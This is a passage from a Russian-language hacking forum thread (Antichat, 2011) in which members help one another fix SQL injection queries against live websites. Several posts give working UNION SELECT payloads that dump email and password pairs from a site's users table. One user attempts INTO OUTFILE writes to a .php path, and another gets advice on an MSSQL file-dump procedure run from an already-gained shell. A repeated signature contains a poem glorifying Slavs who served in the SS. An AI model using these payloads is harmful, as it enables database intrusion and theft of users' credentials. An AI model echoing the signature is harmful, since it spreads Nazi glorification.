HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #18231  
Старый 01.10.2011, 18:46
d1v
Новичок
Регистрация: 21.02.2009
Сообщений: 3
С нами: 9061916

Репутация: 0
По умолчанию

Цитата:
Сообщение от Ulitko  
подскажите запрос к mssql, чтобы вывести определенные столбцы в отдельный текстовик
exec master..sp_makewebtask "путь_до_файла",

"select имя_столбца from имя_таблицы"
 
Ответить с цитированием

  #18232  
Старый 01.10.2011, 18:56
Ulitko
Новичок
Регистрация: 12.08.2011
Сообщений: 18
С нами: 7764086

Репутация: 0
По умолчанию

попробывал этот запрос. Выдает ошибку

(Could not find stored procedure 'master..sp_makewebtask'.)
 
Ответить с цитированием

  #18233  
Старый 01.10.2011, 18:58
wkar
Познающий
Регистрация: 18.10.2009
Сообщений: 80
С нами: 8718197

Репутация: 11
По умолчанию

запрос +UNION+SELECT+1,``,3+from+mysql.user+into+outfile+ `0x2f746d702f31312e706870`--+

в ответ ошибка supplied argument is not a valid MySQL result resource in

Подскажите где она?
 
Ответить с цитированием

  #18234  
Старый 01.10.2011, 19:16
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами: 10585560

Репутация: 1550


По умолчанию

Цитата:
Сообщение от OxoTnik  
Возможен такой вариант, что просто отказывает в выводе таблиц?
мой запрос выглядел по моему правильно
Ошибка
Unknown column 'users' in 'where clause'
users захекси..
 
Ответить с цитированием

  #18235  
Старый 01.10.2011, 19:16
Kuteke
Участник форума
Регистрация: 26.06.2010
Сообщений: 179
С нами: 8357366

Репутация: 6
По умолчанию

users хексни!

0x7573657273

http://steelmuscle.org/hex.php
 
Ответить с цитированием

  #18236  
Старый 01.10.2011, 19:16
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами: 8885780

Репутация: 672


По умолчанию

Цитата:
Сообщение от wkar  
запрос +UNION+SELECT+1,``,3+from+mysql.user+into+outfile+ `0x2f746d702f31312e706870`--+
в ответ ошибка supplied argument is not a valid MySQL result resource in
Подскажите где она?
во первых получишь ошибку

Unknown column '' in 'field list' (указывать надо в прямых ковычках)

во вторых путь к файлу (После into outfile) надо указать в ковычках а не в ( `` )

в третих нельзя захексить путь
 
Ответить с цитированием

  #18237  
Старый 01.10.2011, 19:17
Ulitko
Новичок
Регистрация: 12.08.2011
Сообщений: 18
С нами: 7764086

Репутация: 0
По умолчанию

Цитата:
Сообщение от Ulitko  
попробывал этот запрос. Выдает ошибку
(Could not find stored procedure 'master..sp_makewebtask'.)
забыл добавить, пытаюсь сделать все из под шелла
 
Ответить с цитированием

  #18238  
Старый 01.10.2011, 19:57
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
С нами: 9030566

Репутация: 2017


По умолчанию

Цитата:
Сообщение от None  
http://www.sait.ru/comment.php?idart=-11364+union+%0A+select+1,2,email,password,4,5,6+fr om+0x7573657273--
это шутка????from+0x7573657273

http://www.sait.ru/comment.php?idart=-11364+union+%0A+select+1,2,concat_ws(0x3a,email,pa ssword),4,5,6+fr om+users+--+

http://www.sait.ru/comment.php?idart=-11364+union+%0A+select+1,2,column_name,4,5,6+fr om+information_schema.columns+where+table_name=0x7 573657273+--+

как то так что бы тебе понятнее было что ты пытаешься сделать
__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.
 
Ответить с цитированием

  #18239  
Старый 01.10.2011, 20:10
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
С нами: 9030566

Репутация: 2017


По умолчанию

Цитата:
Сообщение от OxoTnik  
В моем запросе мне уже должен показаться логин и пароль, в твоем он показывает мне колонки которые я уже знаю
http://www.sait.ru/comment.php?idart=-11364+union+%0A+select+1,2,email,password,4,5,6+fr om+0x7573657273-- в этом?????????

в этом запросе он теб не покажет ни какие имайлы и пароли, чуть выше я тебе показал более менее рабочий запрос
__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.
 
Ответить с цитированием

  #18240  
Старый 01.10.2011, 21:09
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами: 10095779

Репутация: 137
По умолчанию

Цитата:
Сообщение от OxoTnik  
Ошибся, он вывел мне логин пасс,спасибо"
только не совсем понятно что делает
concat_ws(0x3a,email,password)
спс все обьяснили
выражаю благодарность
HAXTA4OK
concat_ws() выводит в одном выводимом поле несколько значений которые определяются первыми символами до запятой, а все после запросы будут выводиться разделяясь первыми символами.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 4 (пользователей: 0 , гостей: 4)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.